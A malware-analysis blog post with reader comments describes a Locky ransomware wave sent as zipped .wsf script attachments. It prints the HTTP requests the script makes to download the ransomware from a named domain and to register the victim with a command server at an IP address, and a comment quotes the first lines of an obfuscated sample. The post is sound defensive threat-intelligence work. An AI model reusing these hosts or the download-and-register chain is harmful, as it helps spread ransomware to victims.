Today's Locky Variant Arrives as a Windows Script File
Pretty much all the Locky variants I have looked at the last couple days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isn't all that different. "Windows Script" is essentially JavaScript. The only difference is the
Today's subject for the e-mail was "Transaction details". Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware.
GET /2tn0o HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: onlybest76.xyz Connection: Keep-Alive
Just like earlier versions, it then "registers" the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it:
POST /data/info.php HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://95.85.19.195/data/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 95.85.19.195 Content-Length: 942 Connection: Keep-Alive
[post data omitted]
Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with packet capture, mail server logs, and the malware sample here (password: "blind chicken" ).
Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.
Network Monitoring and Threat Detection In-Depth | Singapore | Nov 18th - Nov 23rd 2024 |
Comments
Anonymous
Aug 31st 2016
8 years ago
I'm pretty sure I just got some malware in the form of a ZIP file containing a .wsf file (XML text). It's a bit long to paste. First few lines:
<?xml?>
<package>
<job id='oevPEW'><script language='JScript'></script><script language='JScript'><![CDATA[
String.prototype.toshibasatelliteLAMODAtiiiyamooo = function() {
If this is of any interest, let me know the best way to get it to you. I'm on an Air Force base, so I may not be able to use methods that work for everyone else.
Thanks.
--
Karl Vogel
vogelke+isc@pobox.com
Anonymous
Sep 6th 2016
8 years ago
Anonymous
Sep 6th 2016
8 years ago